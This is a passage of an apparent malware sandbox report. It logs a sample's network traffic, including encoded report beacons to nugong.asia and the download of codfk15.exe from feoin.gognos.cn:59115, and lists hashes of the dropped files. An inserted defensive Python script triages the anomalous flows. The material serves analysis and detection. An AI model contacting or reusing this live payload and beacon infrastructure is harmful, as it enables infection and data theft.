    • GET [CN]: http://nreprot.nugong.asia/report/report_data?data=…
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /report/report_data?data=… HTTP/1.1
      Host: nreprot.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.17.6.1 Unicorn
      Date: Thu, 16 Nov 2023 12:04:06 GMT
      Content-Type: text/html; charset=utf-8
      X-AspNetMvc-Version: 5.2
      X-AspNet-Version: 4.0.30319
      X-Powered-By: ASP.NET
      X-Cache-Lookup: Cache Miss
      X-Cache-Lookup: Hit From Inner Cluster
      Cache-Control: private
      Content-Length: 3
      X-NWS-LOG-UUID: 248686452332715798
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • GET [CN]: http://mprrpt.nugong.asia/report.php?data=…
      Process: charmap.exe
      Remote address: 119.167.229.212:80
      Request
      GET /report.php?data=… HTTP/1.1
      Host: mprrpt.nugong.asia
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.19.1.1 Unicorn
      Date: Thu, 16 Nov 2023 12:04:06 GMT
      Content-Type: application/octet-stream
      Content-Type: text/html
      X-Cache-Lookup: Cache Miss
      Content-Length: 3
      X-NWS-LOG-UUID: 15826347961273132102
      Connection: keep-alive
      X-Cache-Lookup: Cache Miss
    • DNS [US]: feoin.gognos.cn
      Process: charmap.exe
      Remote address: 8.8.8.8:53
      Request
      feoin.gognos.cn
      IN A
      Response
      feoin.gognos.cn
      IN A
      43.249.192.68
      feoin.gognos.cn
      IN A
      222.173.195.26
    • GET [CN]: http://feoin.gognos.cn:59115/codfk15.exe
      Process: charmap.exe
      Remote address: 43.249.192.68:59115
      Request
      GET /codfk15.exe HTTP/1.1
      Accept: */*
      UA-CPU: AMD64
      Accept-Encoding: gzip, deflate
      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
      Host: feoin.gognos.cn:59115
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Content-Type: application/octet-stream
      Last-Modified: Wed, 08 Nov 2023 13:21:26 GMT
      Accept-Ranges: bytes
      ETag: "e3c1f4794612da1:0"
      Server: Microsoft-IIS/7.5
      X-Powered-By: ASP.NET
      Date: Thu, 16 Nov 2023 12:04:08 GMT
      Content-Length: 14780000
    • 119.167.229.212:443
      down.nugong.asia
      tls
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      13.1kB
      486.6kB
      242
      363
    • 119.167.229.212:80
      http://down.nugong.asia/cfg/cmc/urlmd5.json
      http
      charmap.exe
      75.6kB
      2.7MB
      1311
      1979

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/ping.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userchange.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/userpq.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/blacklist.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/user/c995ec7fd4f57c0d/a8f5d6fe5664609d.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ms.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/pub/ps.json

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/186dc678628340ee/90a22928787e3b5a341729d845ab26d5f93b9db0120714d864.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/05631e93ccdb00ee/945f98f10df53a8f1cfb3848c371d6e3829473480dc6631564.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/006866ef1b75dc55/30d51089d778d32a4d22077fb983ba81fd82d4cf417ac62464.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/Lander.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/psexe.txt

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/cfg/cmc/urlmd5.json

      HTTP Response

      200
    • 101.227.134.49:443
      https://apps.game.qq.com/comm-htdocs/ip/get_ip.php
      tls, http
      charmap.exe
      1.4kB
      5.1kB
      15
      13

      HTTP Request

      GET https://apps.game.qq.com/comm-htdocs/ip/get_ip.php

      HTTP Response

      200
    • 119.167.229.212:443
      down.nugong.asia
      tls
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      1.5kB
      1.1kB
      10
      11
    • 36.143.236.7:80
      http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D
      http
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      910 B
      3.2kB
      9
      6

      HTTP Request

      GET http://ocsp.trust-provider.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTRK6%2BKMEm7xEAA7oRlXypSzGx%2FAgQUyPPFCRszol%2BmEquQ1gC2XPyNHAYCEFeRTDpozwT3OxvpMIocpu0%3D

      HTTP Response

      200
    • 47.246.48.205:80
      http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D
      http
      charmap.exe
      734 B
      2.1kB
      6
      4

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbJNRrm8KxusAb7DCqnMkE%3D

      HTTP Response

      200

      HTTP Request

      GET http://ocsp.digicert.cn/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQhnxEBNL9LgIhfSsTcHsrTt204QgQURNnISjOO01KNp5KUYR%2BayKW37MsCEAlZRMywkYGXHkcMpMgpr8c%3D

      HTTP Response

      200
    • 103.235.47.7:443
      https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json
      tls, http
      charmap.exe
      1.5kB
      11.3kB
      19
      22

      HTTP Request

      GET https://sp1.baidu.com/8aQDcjqpAAV3otqbppnN2DJv/api.php?query=154.61.71.13&resource_id=6006&ie=utf8&oe=gbk&format=json

      HTTP Response

      200
    • 104.18.20.226:80
      http://crl.globalsign.com/root-r3.crl
      http
      charmap.exe
      359 B
      2.6kB
      5
      4

      HTTP Request

      GET http://crl.globalsign.com/root-r3.crl

      HTTP Response

      200
    • 104.18.21.226:80
      http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D
      http
      charmap.exe
      473 B
      2.1kB
      5
      4

      HTTP Request

      GET http://ocsp2.globalsign.com/rootr3/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBT1nGh%2FJBjWKnkPdZIzB1bqhelHBwQUj%2FBLf6guRSSuTVD6Y5qL3uLdG7wCDQHuXyId%2FGI71DM6hVc%3D

      HTTP Response

      200
    • 119.167.229.212:80
      http://mprrpt.nugong.asia/report.php?data=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
      http
      charmap.exe
      28.7kB
      1.3MB
      552
      969

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/b9aa4771a06003c1/4c3c71ab6fb06a3ec85c07a85e2af9e361998acec86eaa1e64.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/62761afc2f0d796a/2087d126bded15fb341729d845ab26d5124b01e56782ef7664.zip

      HTTP Response

      200

      HTTP Request

      GET http://down.nugong.asia/pgm/mds/865609897d54b79b/502855f63d5364d77a01f5e8125b4fe59af4f34fd4851c3764.zip

      HTTP Response

      200

      HTTP Request

      GET http://nreprot.nugong.asia/report/report_data?data=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

      HTTP Response

      200

      HTTP Request

      GET http://mprrpt.nugong.asia/report.php?data=b26a79cea204f54a9c370b6a1cccc50b5bb992835b01fa10452c1698483b553b4ecd305bdb80e30556bab29d9ba195bc7bc425e6c3a804fc8bdd9aa5cee13373d3a8a13b86b22f6aea7db0c272a92108cf7c966ec1eccdeb593526ac8f755910c04aca2c7a3f39c378f01a4751e77a7009a7a10d3d84969ce72f245e6122069982534a4a432e7b61fff47230c8b5824ca5ef63f534d272b5f34582aa287656a831207e053344fd01d723f227f882cdcccb67fc75af9b657a95f61a3df209afa47ae8d60efbb076a5c109c87ede643cf4b4f8e713b5cf2e8c2844bb4914a3a3fcfbeae9da6cd101082eea80d9643860c6c02fe0a87c82927cab3946545e2e1c00ffa7dc35dde4b8a7c6cea977c468cf5558d7b5fa41e180ffe0ed3f5740fe236accf4a104cc54fac8007c3343247e6e40a657d3a3bb35005efd9b3bc962b98bef31e289dd98a036f21b2678f6216636a3341903521116f1d12060b50f73e0fb7f28e7dc6251128477cdc4e777cfcca46bb56e16d20d65e3ee7660bf3c537d0053b77c03eaa4923a06508288210481b5150330b26ef92ca523a743d1b3264d937bc2c115085abd46b8eae6ec9c6f288b201f198a8d3977c5dade52cb1bd1e9d4b257afb8be23307c5c51199d3bf86790578155e9069f078b6b30d30d3a11649c2629418689e87302c7f30f094c60c5a7b3d6d0f4fbb03cd1360b4ca7ff4ef710ea4c18c7b1f75c0ef0ee926d4fe67aee11fabe33bf288d3d344c0c05db343eae17fb3cfb9c40d6b8c6085f2fb14b1ad299fb506a26dae87f8a5fda3f1c0009cb930585271e8f8a0ddf8e72dff0ca0fe0f37393ac4760d773a519cd0fcaa60a3e12

      HTTP Response

      200
    • 43.249.192.68:59115
      http://feoin.gognos.cn:59115/codfk15.exe
      http
      charmap.exe
      288.1kB
      15.2MB
      5872
      10873

      HTTP Request

      GET http://feoin.gognos.cn:59115/codfk15.exe

      HTTP Response

      200
    • 8.8.8.8:53
      54e03c235962947852b3fe22714547f2.vbnm34567.xyz
      dns
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      184 B
      334 B
      2
      2

      DNS Request

      54e03c235962947852b3fe22714547f2.vbnm34567.xyz

      DNS Request

      54e03c235962947852b3fe22714547f2.vbnm34567.xyz

    • 114.114.114.114:53
      down.nugong.asia
      dns
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      62 B
      392 B
      1
      1

      DNS Request

      down.nugong.asia

      DNS Response

      119.167.229.212
      123.12.213.220
      123.12.213.243
      211.93.212.232
      218.29.50.234
      221.15.67.145
      36.248.54.85
      123.12.213.187
      118.212.235.109
      58.144.226.248
      110.249.196.101
      118.212.235.102
      42.56.81.104
      118.212.235.231
      42.231.136.215

    • 8.8.8.8:53
      apps.game.qq.com
      dns
      charmap.exe
      62 B
      94 B
      1
      1

      DNS Request

      apps.game.qq.com

      DNS Response

      101.227.134.49
      101.227.134.27

    • 8.8.8.8:53
      ocsp.trust-provider.cn
      dns
      aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe
      68 B
      300 B
      1
      1

      DNS Request

      ocsp.trust-provider.cn

      DNS Response

      36.143.236.7
      36.248.38.100
      111.13.153.152
      111.48.138.18
      111.206.23.199
      112.50.95.96
      117.27.246.96
      119.36.90.164

    • 8.8.8.8:53
      ocsp.digicert.cn
      dns
      charmap.exe
      62 B
      122 B
      1
      1

      DNS Request

      ocsp.digicert.cn

      DNS Response

      47.246.48.205

    • 8.8.8.8:53
      sp1.baidu.com
      dns
      charmap.exe
      59 B
      176 B
      1
      1

      DNS Request

      sp1.baidu.com

      DNS Response

      103.235.47.7
      103.235.47.102
      103.235.47.103
      103.235.46.40

    • 8.8.8.8:53
      crl.globalsign.com
      dns
      charmap.exe
      64 B
      179 B
      1
      1

      DNS Request

      crl.globalsign.com

      DNS Response

      104.18.20.226
      104.18.21.226

    • 234.2.2.2:10320
      charmap.exe
      46 B
      1
    • 233.123.112.211:53769
      charmap.exe
      1.1kB
      12
    • 255.255.255.255:2641
      charmap.exe
      60 B
      1
    • 8.8.8.8:53
      feoin.gognos.cn
      dns
      charmap.exe
      61 B
      93 B
      1
      1

      DNS Request

      feoin.gognos.cn

      DNS Response

      43.249.192.68
      222.173.195.26

    • 234.2.2.2:10320
      charmap.exe
      46 B
      1
    • 234.2.2.2:10320
      charmap.exe
      46 B
      1
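    The connection summary above is raw sandbox output. What a responder actually wants from it is the short list of entries that are anomalous: the DNS query for down.nugong.asia sent to 114.114.114.114 instead of the VM's resolver (the "Unexpected DNS network traffic destination" signature), the download of codfk15.exe over HTTP on port 59115, and the UDP datagrams from charmap.exe to multicast (234.2.2.2, 233.123.112.211) and broadcast (255.255.255.255) addresses that the sandbox could not decode. The following is an added example and not part of the report or of the sample's tooling: a Python triage pass over a constructed subset of the entries on this page. The configured-resolver set (8.8.8.8) and the tag names are assumptions made for the example.

```python
"""Triage pass over a sandbox report's flattened connection summary (added example)."""
import ipaddress
from urllib.parse import urlsplit

# Assumption: 8.8.8.8 is the resolver the sandbox VM was configured with. The report
# raises "Unexpected DNS network traffic destination" for DNS sent anywhere else.
CONFIGURED_RESOLVERS = {"8.8.8.8"}
STANDARD_PORTS = {"http": 80, "https": 443}

# Constructed input: a subset of the connection summary entries from this page, as
# (destination, label, decoded protocols, process). The label is the URL for HTTP
# flows, the queried name for DNS flows, and empty where the sandbox decoded nothing.
SAMPLE_CONNECTIONS = [
    ("119.167.229.212:80", "http://down.nugong.asia/cfg/cmc/urlmd5.json", "http", "charmap.exe"),
    ("43.249.192.68:59115", "http://feoin.gognos.cn:59115/codfk15.exe", "http", "charmap.exe"),
    ("101.227.134.49:443", "https://apps.game.qq.com/comm-htdocs/ip/get_ip.php", "tls, http", "charmap.exe"),
    ("8.8.8.8:53", "feoin.gognos.cn", "dns", "charmap.exe"),
    ("114.114.114.114:53", "down.nugong.asia", "dns",
     "aadb797f5510dd51561246d61a1e5e1a6157590a248c7f4a8aac374ab0ac2d00.exe"),
    ("234.2.2.2:10320", "", "", "charmap.exe"),
    ("233.123.112.211:53769", "", "", "charmap.exe"),
    ("255.255.255.255:2641", "", "", "charmap.exe"),
]


def split_dest(dest):
    """'ip:port' -> (ipaddress object, int port)."""
    host, _, port = dest.rpartition(":")
    return ipaddress.ip_address(host), int(port)


def classify(dest, label, proto):
    """Anomaly tags for one entry; an empty list means nothing stood out."""
    ip, port = split_dest(dest)
    protos = {p.strip() for p in proto.split(",") if p.strip()}
    tags = []
    if "dns" in protos and str(ip) not in CONFIGURED_RESOLVERS:
        tags.append("dns-to-unconfigured-resolver")
    if ip.is_multicast:
        tags.append("multicast")
    if str(ip) == "255.255.255.255":
        tags.append("broadcast")
    if not protos:
        # Nothing decoded on the flow: short UDP datagrams to odd ports look like this.
        tags.append("undecoded-udp")
    if label.startswith(("http://", "https://")):
        if port != STANDARD_PORTS[urlsplit(label).scheme]:
            tags.append("nonstandard-port")
    return tags


def triage(connections):
    """Map each flagged destination to its tags; unflagged entries are dropped."""
    report = {}
    for dest, label, proto, _process in connections:
        tags = classify(dest, label, proto)
        if tags:
            report[dest] = tags
    return report


def extract_iocs(connections):
    """Remote IPs of HTTP(S) flows plus every hostname contacted or queried."""
    ips, hosts = set(), set()
    for dest, label, proto, _process in connections:
        ip, _ = split_dest(dest)
        if label.startswith(("http://", "https://")):
            ips.add(str(ip))
            hosts.add(urlsplit(label).hostname)
        elif "dns" in proto:
            hosts.add(label)  # resolver IPs are infrastructure, not IOCs
    return ips, hosts


if __name__ == "__main__":
    for dest, tags in triage(SAMPLE_CONNECTIONS).items():
        print(f"{dest:24} {', '.join(tags)}")
    ips, hosts = extract_iocs(SAMPLE_CONNECTIONS)
    print("IPs:", sorted(ips))
    print("Hosts:", sorted(hosts))
```

    To run it over the whole summary, add every entry as a (destination, label, protocol, process) tuple. Two checks worth making by hand alongside it: the codfk15.exe response advertises Content-Length 14780000, which is 14.1 MiB, the size the Downloads list gives for C:\Users\Admin\AppData\Local\Temp\a18c84b5.tmp, so that temp file is the likely on-disk copy of the download; and the multicast and broadcast datagrams, the geolocation lookups to qq.com and baidu.com, and the download itself all come from charmap.exe (C:\charmap.exe, 162KB), not from the submitted sample, so host detections for that activity should key on the dropped file's hashes rather than the original's.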

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\ProgramData\autofmt.exe

      Filesize

      746KB

      MD5

      04fafcaf36632e03b6bfc48275178349

      SHA1

      41191fd8abc13c88aec5a46281d1082a958ed2ff

      SHA256

      c45ee812712c7484d3869811af63d6e78ef885054fe702662104bde5635d8a73

      SHA512

      a251178601db5b53849a7514fc98853720d71e461373e3701289ca9d0c782edf63516bdedc60c17a0d0521db9bfb996a4ffe0d88ddd9ae8c875490bcf47c5f2e

    • C:\Users\Admin\AppData\Local\Temp\Cab52A4.tmp

      Filesize

      61KB

      MD5

      f3441b8572aae8801c04f3060b550443

      SHA1

      4ef0a35436125d6821831ef36c28ffaf196cda15

      SHA256

      6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

      SHA512

      5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

    • C:\Users\Admin\AppData\Local\Temp\Tar7219.tmp

      Filesize

      163KB

      MD5

      9441737383d21192400eca82fda910ec

      SHA1

      725e0d606a4fc9ba44aa8ffde65bed15e65367e4

      SHA256

      bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

      SHA512

      7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

    • C:\Users\Admin\AppData\Local\Temp\a18c84b5.tmp

      Filesize

      14.1MB

      MD5

      b66fb2f31bbc7538ade44d5f5d57675f

      SHA1

      30c2444dc89cbd6f099d21f00d432ade619ad13d

      SHA256

      3b09106f7813ab3e5b7350d269446298291a2722bdf65f705c749725c11fc2a5

      SHA512

      631307a706880c9fa87dc676169f6130c8150d266823dd7e446a29ea0726b9c81d1944f2cbdb3421b81a7770be90231dbc766aaa3d2cec16265c6f8249f47580

    • C:\charmap.exe

      Filesize

      162KB

      MD5

      b4c2ce57f51b9f62956d256eb68973ed

      SHA1

      c6e1ff5d4720d344da996c128f987ce64354e584

      SHA256

      d584f2cdb5b31af93bb7e7e188a7575eafe18e0a786f36bd1236cac79d9bfaa4

      SHA512

      8bcdcf560c69e4bac0f2c611cbf7c27a347fdb00ceb9a160a117a0abffcc7763e2f7d4b8eecc1bccae3316c4dc69a2df75ddbde3222f63bc7fed5ef8b76f7921

    • memory/420-42-0x0000000000870000-0x0000000000898000-memory.dmp

      Filesize

      160KB

    • memory/420-43-0x0000000000870000-0x0000000000898000-memory.dmp

      Filesize

      160KB

    • memory/1304-86-0x0000000006BE0000-0x0000000006CD7000-memory.dmp

      Filesize

      988KB

    • memory/1304-20-0x0000000006BE0000-0x0000000006CD7000-memory.dmp

      Filesize

      988KB

    • memory/1304-16-0x0000000002A70000-0x0000000002A73000-memory.dmp

      Filesize

      12KB

    • memory/1304-121-0x0000000005310000-0x00000000054D5000-memory.dmp

      Filesize

      1.8MB

    • memory/1304-116-0x0000000002A80000-0x0000000002A81000-memory.dmp

      Filesize

      4KB

    • memory/1304-17-0x0000000002A70000-0x0000000002A73000-memory.dmp

      Filesize

      12KB

    • memory/1304-18-0x0000000002A70000-0x0000000002A73000-memory.dmp

      Filesize

      12KB

    • memory/1304-69-0x0000000006BE0000-0x0000000006CD7000-memory.dmp

      Filesize

      988KB

    • memory/1304-19-0x0000000006BE0000-0x0000000006CD7000-memory.dmp

      Filesize

      988KB

    • memory/2788-97-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-103-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-39-0x0000000001CD0000-0x0000000001D9B000-memory.dmp

      Filesize

      812KB

    • memory/2788-37-0x0000000001CD0000-0x0000000001D9B000-memory.dmp

      Filesize

      812KB

    • memory/2788-36-0x0000000001CD0000-0x0000000001D9B000-memory.dmp

      Filesize

      812KB

    • memory/2788-87-0x0000000001CD0000-0x0000000001D9B000-memory.dmp

      Filesize

      812KB

    • memory/2788-94-0x0000000037510000-0x0000000037520000-memory.dmp

      Filesize

      64KB

    • memory/2788-96-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-28-0x00000000001B0000-0x00000000001B1000-memory.dmp

      Filesize

      4KB

    • memory/2788-98-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-99-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-100-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-101-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-38-0x000007FEBD7E0000-0x000007FEBD7F0000-memory.dmp

      Filesize

      64KB

    • memory/2788-102-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-104-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-108-0x0000000004F90000-0x00000000050B3000-memory.dmp

      Filesize

      1.1MB

    • memory/2788-109-0x0000000001FD0000-0x0000000001FD1000-memory.dmp

      Filesize

      4KB

    • memory/2788-110-0x0000000005310000-0x00000000054D5000-memory.dmp

      Filesize

      1.8MB

    • memory/2788-111-0x0000000005310000-0x00000000054D5000-memory.dmp

      Filesize

      1.8MB

    • memory/2788-112-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

      Filesize

      4KB

    • memory/2788-34-0x00000000001E0000-0x00000000001E3000-memory.dmp

      Filesize

      12KB

    • memory/2788-120-0x0000000004F90000-0x00000000050B3000-memory.dmp

      Filesize

      1.1MB

    • memory/2788-26-0x0000000000060000-0x0000000000123000-memory.dmp

      Filesize

      780KB

    • memory/2788-31-0x00000000001E0000-0x00000000001E3000-memory.dmp

      Filesize

      12KB

    • memory/2788-131-0x0000000005310000-0x00000000054D5000-memory.dmp

      Filesize

      1.8MB
